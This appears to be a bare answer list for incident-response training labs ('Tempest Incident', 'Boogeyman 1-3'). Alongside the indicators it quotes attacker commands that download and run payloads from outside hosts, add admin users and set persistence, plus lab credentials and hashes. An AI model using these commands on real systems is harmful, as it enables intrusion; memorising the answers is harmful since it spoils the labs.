Tempest Incident

CB3A1E6ACFB246F256FBFEFDB6F494941AA30A5A7C3F5258C3E63CFA27A23DC6 665DC3519C2C235188201B5A8594FEA205C3BCBC75193363B87D2837ACA3C91F D0279D5292BC5B25595115032820C978838678F4333B725998CFE9253E186D60 free_magicules.doc benimaru-TEMPEST 496 167.71.199.191 JGFwcD1bRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdBcHBsaWNhdGlvbkRhdGEnKTtjZCAiJGFwcFxNaWNyb3NvZnRcV2luZG93c1xTdGFydCBNZW51XFByb2dyYW1zXFN0YXJ0dXAiOyBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy91cGRhdGUuemlwIC1vdXRmaWxlIHVwZGF0ZS56aXA7IEV4cGFuZC1BcmNoaXZlIC5cdXBkYXRlLnppcCAtRGVzdGluYXRpb25QYXRoIC47IHJtIHVwZGF0ZS56aXA7Cg== 2022-30190 C:\Users\benimaru\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noni certutil -urlcache -split -f 'http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe CE278CA242AA2023A4FE04067B0A32FBD3CA1599746C160949868FFC7FC3D7D8 resolvecyber.xyz:80\ http://phishteam.xyz/02dcf07/index.html base64 q /9ab62b5 GET nim infernotempest 5985 C:\Users\benimaru\Downloads\ch.exe client 167.71.199.191:8080 R:socks 8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451 chisel winrm spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D printspoofer SeImpersonatePrivilege final.exe 8080 shion,shuna /add 4720 net localgroup administrators /add shion 4732 C:\Windows\system32\sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto

Boogeyman 1

agriffin@bpakcaging.xyz julianne.westcott@hotmail.com elasticemail Invoice_20230103.lnk Invoice2023! aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA cdn.bpakcaging.xyz,files.bpakcaging.xyz seatbelt C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.SQLite Microsoft Sticky Notes protected_data.kdbx keepass hex nslookup python POST dns %p9^3!lL^Mz47E2GaT^y 4024007128269551

Boogeyman 2

westaylor23@outlook.com maxine.beck@quicklogisticsorg.onmicrosoft.com Resume_WesleyTaylor.doc 52c4384a0b9e248b95804352ebec6c5b https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png wscript.exe C:\ProgramData\update.js 4260 1124 https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe 6216 C:\Windows\Tasks\updater.exe 128.199.95.189:8080 C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))\"'

Boogeyman 3

6392 "C:\Windows\System32\xcopy.exe" /s /i /e /h D:\review.dat C:\Users\EVAN~1.HUT\AppData\Local\Temp\review.dat "C:\Windows\System32\rundll32.exe" D:\review.dat,DllRegisterServer Review 165.232.170.151:80 fodhelper.exe https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip itadmin:F84769D250EB95EB2D7D8B4A1C5613F2 IT_Automation.ps1 QUICKLOGISTICS\allan.smith:Tr!ckyP@ssw0rd987 WKSTN-1327 wsmprovhost.exe administrator:00f80f2538dcb54e7adc715c0e7091ec backupda http://ff.sillytechninja.io/ransomboogey.exe